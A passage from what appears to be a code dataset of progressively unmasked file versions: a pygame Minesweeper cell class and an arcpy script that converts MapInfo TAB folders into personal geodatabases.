6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n <mask token>\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-2": "<mask token>\n\n\nclass Cell:\n\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(\n self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n if (not neighbor.revelada and not neighbor.flag_enabled and\n not self.game.is_game_over):\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba:\n self.game.score += 1\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n <mask token>\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-3": "<mask token>\n\n\nclass Cell:\n\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(\n self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n if (not neighbor.revelada and not neighbor.flag_enabled and\n not self.game.is_game_over):\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba:\n self.game.score += 1\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n\n def set_bomb(self):\n \"\"\"\n This function will turn this cell into a cell with a bomb \n (just to keep organized)\n \"\"\"\n self.bomba = True\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-4": "import pygame\nfrom settings import *\nimport random\n\n\nclass Cell:\n\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n if neighbor.bomba:\n total += 1\n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(\n self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n if (not neighbor.revelada and not neighbor.flag_enabled and\n not self.game.is_game_over):\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba:\n self.game.score += 1\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = 0, 0, 0\n if self.bombs_around == 1:\n text_color = 0, 0, 150\n if self.bombs_around == 2:\n text_color = 0, 150, 0\n if self.bombs_around == 3:\n text_color = 150, 0, 0\n if self.bombs_around == 4:\n text_color = 133, 39, 138\n if self.bombs_around == 5:\n text_color = 128, 0, 0\n if self.bombs_around == 6:\n text_color = 175, 238, 238\n if self.bombs_around == 7:\n text_color = 0, 0, 0\n if self.bombs_around == 8:\n text_color = 33, 161, 166\n font = pygame.font.Font('fonts/JetBrainsMono-Bold.ttf', 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n\n def set_bomb(self):\n \"\"\"\n This function will turn this cell into a cell with a bomb \n (just to keep organized)\n \"\"\"\n self.bomba = True\n\n def draw_cell(self):\n pygame.draw.rect(self.game.screen, WHITE, (self.x, self.y, TILESIZE -\n 1, TILESIZE - 1))\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(self.game.screen, RED, (self.x + 10, self.\n y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(self.game.screen, GRAY, (self.x, self.y, \n TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-5": "import pygame\nfrom settings import *\nimport random\n\n\nclass Cell:\n def __init__(self, game, x, y, bombs):\n self.game = game\n self.x = x\n self.y = y\n self.i = x // TILESIZE\n self.j = y // TILESIZE\n self.revelada = False\n self.bomba = False\n self.bombas_total = bombs\n self.bombs_around = 0\n self.flag_enabled = False\n\n def reveal(self):\n if not self.game.is_game_over:\n self.revelada = True\n\n if self.bombs_around == 0:\n self.flood()\n if self.bomba:\n self.game.is_game_over = True\n self.game.score = 0\n EFFECT.play()\n\n def check_neighbours(self, grid):\n \"\"\"\n This function will count how many bombs there is around a particular cell\n \"\"\"\n if self.bomba:\n self.bombs_around = -1\n return\n\n total = 0\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(grid) and j > -1 and j < len(grid[1]):\n neighbor = grid[i][j]\n\n if neighbor.bomba:\n total += 1\n \n self.bombs_around = total\n\n def flood(self):\n for x in range(-1, 2):\n for y in range(-1, 2):\n i = self.i + x\n j = self.j + y\n if i > -1 and i < len(self.game.grid) and j > -1 and j < len(self.game.grid[1]):\n neighbor = self.game.grid[i][j]\n\n if not neighbor.revelada and not neighbor.flag_enabled and not self.game.is_game_over:\n neighbor.reveal()\n\n def enable_flag(self):\n self.flag_enabled = not self.flag_enabled\n if self.bomba: # TODO: and self.flag_enabled\n self.game.score += 1\n # TODO: else: self.game.score -= 1\n # all the spots revealed shouldn't be a bomb\n\n def draw_number(self):\n \"\"\"\n This function will draw the numbers according to the total of bombs around the cell.\n Also it will give colors to some numbers\n \"\"\"\n text_color = (0, 0, 0)\n if self.bombs_around == 1:\n text_color = (0, 0, 150)\n if self.bombs_around == 2:\n text_color = (0, 150, 0)\n if self.bombs_around == 3:\n text_color = (150, 0, 0)\n if self.bombs_around == 4:\n text_color = (133, 39, 138)\n if self.bombs_around == 5:\n text_color = (128, 0, 0)\n if self.bombs_around == 6:\n text_color = (175, 238, 238)\n if self.bombs_around == 7:\n text_color = (0, 0, 0)\n if self.bombs_around == 8:\n text_color = (33, 161, 166)\n\n font = pygame.font.Font(\"fonts/JetBrainsMono-Bold.ttf\", 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(\n str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))\n\n def set_bomb(self):\n \"\"\"\n This function will turn this cell into a cell with a bomb \n (just to keep organized)\n \"\"\"\n self.bomba = True\n\n def draw_cell(self):\n\n pygame.draw.rect(\n self.game.screen, WHITE, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))\n\n if self.revelada:\n if self.bomba:\n pygame.draw.rect(\n self.game.screen, RED, (self.x + 10, self.y + 10, TILESIZE - 23, TILESIZE - 23))\n else:\n pygame.draw.rect(\n self.game.screen, GRAY, (self.x, self.y, TILESIZE - 1, TILESIZE - 1))\n if self.flag_enabled and not self.revelada:\n self.game.flag.draw(self.game.screen, self.x + 10, self.y + 10)\n\n def get_mouse_pos(self):\n mouse = pygame.mouse.get_pos()\n return [mouse[0] // TILESIZE, mouse[1] // TILESIZE]\n",
"step-ids": [
6,
9,
10,
11,
12
]
}
|
[
6,
9,
10,
11,
12
] |
# -*- coding: cp1251 -*-
import arcpy as a
from arcpy import AddMessage as msg, AddWarning as warning, AddError as error
from os import mkdir, walk
from os.path import join, dirname, basename, splitext
from glob import glob as get_files
from shutil import copy
from collections import OrderedDict
input_folder = a.GetParameterAsText(0)
output_folder = a.GetParameterAsText(1)
enable_rewrite_databases = a.GetParameterAsText(2)
enable_rewrite_tabs = a.GetParameterAsText(3)
input_folders_order = [root.replace(input_folder + '\\', '') for root, dirs, _ in walk(input_folder)]
output_folders_order = [root.replace(output_folder + '\\', '') for root, dirs, _ in walk(output_folder)]
input_folders_unordered_dict = {root.replace(input_folder + '\\', ''):dirs for root, dirs, _ in walk(input_folder)}
output_folders_unordered_dict = {root.replace(output_folder + '\\', ''):dirs for root, dirs, _ in walk(output_folder)}
input_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in input_folders_order)
output_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in output_folders_order)
msg("\nПроверка на наличие подпапок исходной папки в выходной:")
for folder in input_folders:
if folder in output_folders:
warning(' ' + folder)
else:
error(' ' + folder)
msg("\nПроверка на наличие подпапок выходной папки в исходной:")
remove_list = []
for folder in output_folders:
if folder in input_folders:
warning(' ' + folder)
else:
remove_list.append(folder)
error(' ' + folder)
for folder in remove_list:
output_folders.pop(folder, None)
msg("\nКопирование файлов в папки...")
remove_list = []
for subfolders in output_folders:
tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, "*.TAB"))]
if not tab_files:
remove_list.append(subfolders)
if u"Импорт" in subfolders:
continue
else:
similar_output_folder = join(output_folder, subfolders)
msg(' ' + subfolders)
files_to_copy = [copy_file for copy_file in get_files(join(input_folder, subfolders, "*.*"))]
for file_to_copy in files_to_copy:
_, file_extension = splitext(file_to_copy)
if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID', '.IND', '.MAP']:
msg(' ' + file_to_copy)
copy(file_to_copy, similar_output_folder)
for folder in remove_list:
output_folders.pop(folder, None)
output_folders.pop('', None)
msg("\nСоздание баз данных...")
for output_subfolders in output_folders:
mdb_name = basename(output_subfolders)
mdb_local_path = join(output_subfolders, mdb_name + ".mdb")
if enable_rewrite_databases == 'true':
a.Delete_management(join(output_folder, output_subfolders, mdb_name + ".mdb"))
try:
a.CreatePersonalGDB_management(join(output_folder, output_subfolders), mdb_name + ".mdb")
msg(" " + mdb_local_path)
except a.ExecuteError:
warning(" " + mdb_local_path)
msg("\nКонвертация TAB в слои...")
layer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']
for subfolders in output_folders:
tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, "*.TAB"))]
for tab_file_path in tab_files:
for layer_type in layer_types:
tab_name = basename(tab_file_path).replace('.TAB', '')
layer_from_name = tab_name + ' ' + layer_type
layer_from = join(tab_file_path, layer_from_name)
a.Exists(layer_from)
if not a.Exists(layer_from):
continue
layer_to_name = layer_from_name.replace(' ', '_')
if layer_to_name[0].isdigit():
layer_to_name = 'L' + layer_to_name
layer_to = join(output_folder, subfolders, basename(subfolders) + '.mdb', layer_to_name)
local_tab_path = join(subfolders, tab_name + '.TAB')
if a.Exists(layer_to) and enable_rewrite_tabs == 'true':
a.Delete_management(layer_to)
msg(u' ' + local_tab_path + ' ' + layer_type)
elif a.Exists(layer_to):
warning(u' ' + local_tab_path + ' ' + layer_type)
continue
elif not a.Exists(layer_to):
msg(u' ' + local_tab_path + ' ' + layer_type)
try:
a.CopyFeatures_management(layer_from, layer_to)
except:
try:
a.CopyRows_management(layer_from, layer_to)
except Exception as e:
error(' Ошибка. Копирование объектов/строк не сработало:' + str(e))
|
normal
|
{
"blob_id": "409e0fc0b1c1d86c5526d33ba271a8387eecf748",
"index": 9872,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nmsg(\"\"\"\nПроверка на наличие подпапок исходной папки в выходной:\"\"\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\nmsg(\"\"\"\nПроверка на наличие подпапок выходной папки в исходной:\"\"\")\n<mask token>\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\nmsg(\"\"\"\nКопирование файлов в папки...\"\"\")\n<mask token>\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n if not tab_files:\n remove_list.append(subfolders)\n if u'Импорт' in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n msg(' ' + subfolders)\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder,\n subfolders, '*.*'))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID',\n '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\noutput_folders.pop('', None)\nmsg(\"\"\"\nСоздание баз данных...\"\"\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + '.mdb')\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name +\n '.mdb'))\n try:\n a.CreatePersonalGDB_management(join(output_folder,\n output_subfolders), mdb_name + '.mdb')\n msg(' ' + mdb_local_path)\n except a.ExecuteError:\n warning(' ' + mdb_local_path)\nmsg(\"\"\"\nКонвертация TAB в слои...\"\"\")\n<mask token>\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n a.Exists(layer_from)\n if not a.Exists(layer_from):\n continue\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) +\n '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(\n ' Ошибка. Копирование объектов/строк не сработало:'\n + str(e))\n",
"step-3": "<mask token>\ninput_folder = a.GetParameterAsText(0)\noutput_folder = a.GetParameterAsText(1)\nenable_rewrite_databases = a.GetParameterAsText(2)\nenable_rewrite_tabs = a.GetParameterAsText(3)\ninput_folders_order = [root.replace(input_folder + '\\\\', '') for root, dirs,\n _ in walk(input_folder)]\noutput_folders_order = [root.replace(output_folder + '\\\\', '') for root,\n dirs, _ in walk(output_folder)]\ninput_folders_unordered_dict = {root.replace(input_folder + '\\\\', ''): dirs for\n root, dirs, _ in walk(input_folder)}\noutput_folders_unordered_dict = {root.replace(output_folder + '\\\\', ''):\n dirs for root, dirs, _ in walk(output_folder)}\ninput_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in\n input_folders_order)\noutput_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in\n output_folders_order)\nmsg(\"\"\"\nПроверка на наличие подпапок исходной папки в выходной:\"\"\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\nmsg(\"\"\"\nПроверка на наличие подпапок выходной папки в исходной:\"\"\")\nremove_list = []\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\nmsg(\"\"\"\nКопирование файлов в папки...\"\"\")\nremove_list = []\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n if not tab_files:\n remove_list.append(subfolders)\n if u'Импорт' in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n msg(' ' + subfolders)\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder,\n subfolders, '*.*'))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID',\n '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\noutput_folders.pop('', None)\nmsg(\"\"\"\nСоздание баз данных...\"\"\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + '.mdb')\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name +\n '.mdb'))\n try:\n a.CreatePersonalGDB_management(join(output_folder,\n output_subfolders), mdb_name + '.mdb')\n msg(' ' + mdb_local_path)\n except a.ExecuteError:\n warning(' ' + mdb_local_path)\nmsg(\"\"\"\nКонвертация TAB в слои...\"\"\")\nlayer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n a.Exists(layer_from)\n if not a.Exists(layer_from):\n continue\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) +\n '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(\n ' Ошибка. Копирование объектов/строк не сработало:'\n + str(e))\n",
"step-4": "import arcpy as a\nfrom arcpy import AddMessage as msg, AddWarning as warning, AddError as error\nfrom os import mkdir, walk\nfrom os.path import join, dirname, basename, splitext\nfrom glob import glob as get_files\nfrom shutil import copy\nfrom collections import OrderedDict\ninput_folder = a.GetParameterAsText(0)\noutput_folder = a.GetParameterAsText(1)\nenable_rewrite_databases = a.GetParameterAsText(2)\nenable_rewrite_tabs = a.GetParameterAsText(3)\ninput_folders_order = [root.replace(input_folder + '\\\\', '') for root, dirs,\n _ in walk(input_folder)]\noutput_folders_order = [root.replace(output_folder + '\\\\', '') for root,\n dirs, _ in walk(output_folder)]\ninput_folders_unordered_dict = {root.replace(input_folder + '\\\\', ''): dirs for\n root, dirs, _ in walk(input_folder)}\noutput_folders_unordered_dict = {root.replace(output_folder + '\\\\', ''):\n dirs for root, dirs, _ in walk(output_folder)}\ninput_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in\n input_folders_order)\noutput_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in\n output_folders_order)\nmsg(\"\"\"\nПроверка на наличие подпапок исходной папки в выходной:\"\"\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\nmsg(\"\"\"\nПроверка на наличие подпапок выходной папки в исходной:\"\"\")\nremove_list = []\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\nmsg(\"\"\"\nКопирование файлов в папки...\"\"\")\nremove_list = []\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n if not tab_files:\n remove_list.append(subfolders)\n if u'Импорт' in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n msg(' ' + subfolders)\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder,\n subfolders, '*.*'))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID',\n '.IND', '.MAP']:\n msg(' ' + file_to_copy)\n copy(file_to_copy, similar_output_folder)\nfor folder in remove_list:\n output_folders.pop(folder, None)\noutput_folders.pop('', None)\nmsg(\"\"\"\nСоздание баз данных...\"\"\")\nfor output_subfolders in output_folders:\n mdb_name = basename(output_subfolders)\n mdb_local_path = join(output_subfolders, mdb_name + '.mdb')\n if enable_rewrite_databases == 'true':\n a.Delete_management(join(output_folder, output_subfolders, mdb_name +\n '.mdb'))\n try:\n a.CreatePersonalGDB_management(join(output_folder,\n output_subfolders), mdb_name + '.mdb')\n msg(' ' + mdb_local_path)\n except a.ExecuteError:\n warning(' ' + mdb_local_path)\nmsg(\"\"\"\nКонвертация TAB в слои...\"\"\")\nlayer_types = ['Line', 'NoGeometry', 'Point', 'Polygon', 'Text']\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder,\n subfolders, '*.TAB'))]\n for tab_file_path in tab_files:\n for layer_type in layer_types:\n tab_name = basename(tab_file_path).replace('.TAB', '')\n layer_from_name = tab_name + ' ' + layer_type\n layer_from = join(tab_file_path, layer_from_name)\n a.Exists(layer_from)\n if not a.Exists(layer_from):\n continue\n layer_to_name = layer_from_name.replace(' ', '_')\n if layer_to_name[0].isdigit():\n layer_to_name = 'L' + layer_to_name\n layer_to = join(output_folder, subfolders, basename(subfolders) +\n '.mdb', layer_to_name)\n local_tab_path = join(subfolders, tab_name + '.TAB')\n if a.Exists(layer_to) and enable_rewrite_tabs == 'true':\n a.Delete_management(layer_to)\n msg(u' ' + local_tab_path + ' ' + layer_type)\n elif a.Exists(layer_to):\n warning(u' ' + local_tab_path + ' ' + layer_type)\n continue\n elif not a.Exists(layer_to):\n msg(u' ' + local_tab_path + ' ' + layer_type)\n try:\n a.CopyFeatures_management(layer_from, layer_to)\n except:\n try:\n a.CopyRows_management(layer_from, layer_to)\n except Exception as e:\n error(\n ' Ошибка. Копирование объектов/строк не сработало:'\n + str(e))\n",
"step-5": "# -*- coding: cp1251 -*-\nimport arcpy as a\nfrom arcpy import AddMessage as msg, AddWarning as warning, AddError as error\n\nfrom os import mkdir, walk\nfrom os.path import join, dirname, basename, splitext\nfrom glob import glob as get_files\nfrom shutil import copy\nfrom collections import OrderedDict\n\ninput_folder = a.GetParameterAsText(0)\noutput_folder = a.GetParameterAsText(1)\nenable_rewrite_databases = a.GetParameterAsText(2)\nenable_rewrite_tabs = a.GetParameterAsText(3)\n\n\n\ninput_folders_order = [root.replace(input_folder + '\\\\', '') for root, dirs, _ in walk(input_folder)]\noutput_folders_order = [root.replace(output_folder + '\\\\', '') for root, dirs, _ in walk(output_folder)]\n\ninput_folders_unordered_dict = {root.replace(input_folder + '\\\\', ''):dirs for root, dirs, _ in walk(input_folder)}\noutput_folders_unordered_dict = {root.replace(output_folder + '\\\\', ''):dirs for root, dirs, _ in walk(output_folder)}\n\ninput_folders = OrderedDict((k, input_folders_unordered_dict[k]) for k in input_folders_order)\noutput_folders = OrderedDict((k, output_folders_unordered_dict[k]) for k in output_folders_order)\n\nmsg(\"\\nПроверка на наличие подпапок исходной папки в выходной:\")\nfor folder in input_folders:\n if folder in output_folders:\n warning(' ' + folder)\n else:\n error(' ' + folder)\n\nmsg(\"\\nПроверка на наличие подпапок выходной папки в исходной:\")\nremove_list = []\nfor folder in output_folders:\n if folder in input_folders:\n warning(' ' + folder)\n else:\n remove_list.append(folder)\n error(' ' + folder)\n\nfor folder in remove_list:\n output_folders.pop(folder, None)\n\n\n\nmsg(\"\\nКопирование файлов в папки...\")\nremove_list = []\nfor subfolders in output_folders:\n tab_files = [tab_file for tab_file in get_files(join(input_folder, subfolders, \"*.TAB\"))]\n if not tab_files:\n remove_list.append(subfolders)\n\n if u\"Импорт\" in subfolders:\n continue\n else:\n similar_output_folder = join(output_folder, subfolders)\n\n msg(' ' + subfolders)\n\n files_to_copy = [copy_file for copy_file in get_files(join(input_folder, subfolders, \"*.*\"))]\n for file_to_copy in files_to_copy:\n _, file_extension = splitext(file_to_copy)\n if file_extension not in ['.wor', '.WOR', '.TAB', '.DAT', '.ID', '.IND', '.MAP']:\n msg(' ' + 